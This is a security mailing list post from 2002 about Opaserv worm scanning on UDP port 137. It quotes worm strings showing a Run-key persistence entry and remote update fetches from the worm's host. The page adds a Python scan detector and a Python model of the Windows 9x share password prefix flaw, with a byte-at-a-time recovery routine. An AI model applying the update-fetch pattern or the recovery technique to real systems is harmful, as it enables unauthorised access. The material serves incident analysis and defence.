Security Incidents mailing list archives
Re: Unusual volume: UDP:137 probes
From: Alain Fauconnet <alain () cscoms net>
Date: Fri, 4 Oct 2002 14:13:55 +0700
On Fri, Oct 04, 2002 at 07:58:18AM +1200, Nick FitzGerald wrote:
> Richard.Grant () mail state ky us wrote:
> > Two...
>
> You are right that Bugbear does not produce the flood of port 137 traffic currently being reported. Bugbear does some spreading via open or otherwise accessible shares (those writable with the permissions of the user that ran the EXE) but it uses standard known network resource enumeration APIs to do its work. Opaserv (aka Scrup, Scrsvr, Opasoft) aggressively scans for machines listening on port 137 and is the likely source of most of the increased port 137 activity.
>
> ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Windows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Internet Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat.ScrSout.dat.scrupd.exe.www.opasoft.com.GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1..Host: www.opasoft.com.....GET http://www.opasoft.com/work/lastver HTTP/1.1..Host:<<snip>>
Talking of Opaserv, I have an example of a Win95 OSR2.1 box (yes, I know) which saw SCRSVR.EXE appear in its Windows folder while online. McAfee caught it immediately so it didn't have a chance to run. However, this box *did* have passwords set on the shares (yes, all of them, I have checked). These passwords were quite non-obvious so I doubt that they could be found as a result of a brute-force attack.

I know that Win95 had its share of bugs regarding SMB passwords. This one looks like a good candidate:

http://security-archive.merton.ox.ac.uk/bugtraq-200010/0228.html
NSFOCUS Security Advisory (SA2000-05)

But then it means that Opaserv goes beyond checking for passwordless shares (that's all I have seen written so far). It also exploits known vulnerabilities.

Greets,
_Alain_

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
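The port 137 scanning Nick describes above shows up on a border firewall as a burst of inbound UDP/137 (NetBIOS Name Service) datagrams from one source to many destinations. The following is an added example, not code from the thread or from any of its participants: it parses iptables-style deny-log lines and flags a source as a scanner once it reaches a threshold of distinct UDP/137 destinations inside one fixed time window, which separates a worm-style sweep from a legitimate host re-querying the same name server. The log lines, the RFC 5737 addresses, the threshold of 5 and the year 2002 assumed for the year-less syslog timestamps are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed iptables-style deny-log lines standing in for a border firewall's
# inbound log during a port 137 sweep; addresses are RFC 5737 documentation
# ranges, not real hosts. One source fans out to eight targets, one source
# repeats a query to a single target, one line is TCP/139, one is not a packet.
SAMPLE_LOG = """\
Oct  4 13:58:01 gw kernel: DROP IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.10 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:01 gw kernel: DROP IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.11 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:02 gw kernel: DROP IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.12 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:02 gw kernel: DROP IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.13 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:03 gw kernel: DROP IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.14 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:03 gw kernel: DROP IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.15 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:04 gw kernel: DROP IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.16 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:04 gw kernel: DROP IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.17 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:05 gw kernel: DROP IN=eth0 OUT= SRC=192.0.2.5 DST=198.51.100.10 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:09 gw kernel: DROP IN=eth0 OUT= SRC=192.0.2.5 DST=198.51.100.10 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:58:10 gw kernel: DROP IN=eth0 OUT= SRC=192.0.2.5 DST=198.51.100.20 PROTO=TCP SPT=1045 DPT=139 LEN=48 SYN
Oct  4 13:58:11 gw kernel: device eth0 entered promiscuous mode
"""

# Syslog timestamp, host, "kernel:", then the netfilter key=value fields we need.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ kernel: .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) PROTO=(?P<proto>\w+) "
    r"SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)"
)


def parse_line(line, year=2002):
    """Return (timestamp, src, dst, proto, dpt) for a packet line, else None.

    Syslog timestamps carry no year, so one is assumed (2002 here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], m["dst"], m["proto"], int(m["dpt"])


def nbns_fanout(lines, window_seconds=60):
    """Peak number of distinct UDP/137 destinations per source within any
    fixed window_seconds bucket. Only UDP with DPT=137 is counted."""
    buckets = defaultdict(set)  # (src, bucket) -> {dst, ...}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, dst, proto, dpt = rec
        if proto != "UDP" or dpt != 137:
            continue
        bucket = int(ts.timestamp()) // window_seconds
        buckets[(src, bucket)].add(dst)
    peak = defaultdict(int)
    for (src, _), dsts in buckets.items():
        peak[src] = max(peak[src], len(dsts))
    return dict(peak)


def find_scanners(lines, threshold=5, window_seconds=60):
    """Sources whose UDP/137 fan-out in one window reaches the threshold."""
    return {src: n for src, n in nbns_fanout(lines, window_seconds).items()
            if n >= threshold}


if __name__ == "__main__":
    for src, n in sorted(find_scanners(SAMPLE_LOG.splitlines()).items()):
        print(f"{src}: {n} distinct UDP/137 targets in one window")
```

Fan-out per window, rather than raw packet count, is the useful signal here: a host repeating a name query to one server generates volume but never exceeds a fan-out of one, while a worm sweeping a netblock touches a new destination with nearly every datagram.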
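The advisory Alain links, NSFOCUS SA2000-05, describes the Windows 9x share-level password bypass: the server compares only as many bytes of the stored share password as the client sends, so a one-byte guess is accepted whenever that byte is right and the whole password falls to a byte-at-a-time search of at most 256 tries per position, which is why the strength of the password itself gives no protection against that bug. The following added example is an illustrative Python model of that comparison flaw written for this page; it is not Windows code and speaks no SMB. The function names, the `max_len` guard and the sample password are assumptions of the example.

```python
import hmac

# Illustrative model of a length-controlled password comparison, the bug class
# described in NSFOCUS SA2000-05 for Windows 9x share-level passwords.
# Written for this page: not Windows code, and no SMB protocol is involved.


def share_check_vulnerable(stored: bytes, supplied: bytes) -> bool:
    """Compares only len(supplied) bytes, so any non-empty prefix of the
    stored password is accepted. This is the flaw being modelled."""
    return len(supplied) > 0 and stored[:len(supplied)] == supplied


def share_check_fixed(stored: bytes, supplied: bytes) -> bool:
    """Full-length, constant-time comparison: a short guess is just wrong,
    and different lengths never compare equal."""
    return hmac.compare_digest(stored, supplied)


def recover_password(check, max_len=16):
    """Byte-at-a-time search against an oracle check(candidate) -> bool.

    Returns (recovered_bytes, attempts). Against the vulnerable check this
    needs at most 256 * (len(password) + 1) attempts instead of 256**len;
    against the fixed check no single byte is ever accepted, so the search
    stops after the first 256 with nothing recovered. max_len only bounds
    the loop and is an assumption of the example."""
    found = b""
    attempts = 0
    while len(found) <= max_len:
        for b in range(256):
            attempts += 1
            if check(found + bytes([b])):
                found += bytes([b])
                break
        else:
            break  # no one-byte extension is accepted: `found` is complete
    return found, attempts


def demo(password=b"Zq7#kL2w"):
    """Run the search against both checks for one constructed password."""
    weak = recover_password(lambda s: share_check_vulnerable(password, s))
    strong = recover_password(lambda s: share_check_fixed(password, s))
    return weak, strong


if __name__ == "__main__":
    (pw, n), (pw2, n2) = demo()
    print(f"vulnerable check: recovered {pw!r} in {n} attempts "
          f"(exhaustive search would be up to 256**{len(pw)})")
    print(f"fixed check: recovered {pw2!r}, gave up after {n2} attempts")
```

The search terminates on its own: once `found` equals the full stored password, every one-byte extension is longer than the stored value and the prefix comparison fails for all 256 candidates, which is the signal that the password is complete.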
Current thread:
- RE: Unusual volume: UDP:137 probes Bamm (Robert) Visscher (Sep 30)
- <Possible follow-ups>
- Re: Unusual volume: UDP:137 probes Nick FitzGerald (Sep 30)
- RE: Unusual volume: UDP:137 probes Mark Forsyth (Sep 30)
- RE: Unusual volume: UDP:137 probes Joseph R. Gruber (Sep 30)
- Re: Unusual volume: UDP:137 probes Hugo van der Kooij (Sep 30)
- SV: Unusual volume: UDP:137 probes Peter Kruse (Oct 01)
- Re: Unusual volume: UDP:137 probes Christopher Albert (Sep 30)
- RE: Unusual volume: UDP:137 probes Richard . Grant (Oct 01)
- RE: Unusual volume: UDP:137 probes Nick FitzGerald (Oct 03)
- Re: Unusual volume: UDP:137 probes Alain Fauconnet (Oct 04)
- Re: Unusual volume: UDP:137 probes Matt Power (Oct 05)
- RE: Unusual volume: UDP:137 probes Nick FitzGerald (Oct 03)
- RE: Unusual volume: UDP:137 probes Scott, Michael R. (Oct 01)
- Re: Unusual volume: UDP:137 probes Axel Pettinger (Oct 01)
- Re: Unusual volume: UDP:137 probes James Sneeringer (Oct 01)
- maybe a simple problem Andrew Fison (Oct 02)
- Re: maybe a simple problem Igor D. Spivak (Oct 02)
- RE: maybe a simple problem Greg Reber (Oct 03)
- Re: maybe a simple problem Brad Arlt (Oct 03)
- Re: Unusual volume: UDP:137 probes James Sneeringer (Oct 01)
- Re: Unusual volume: UDP:137 probes John Sage (Oct 01)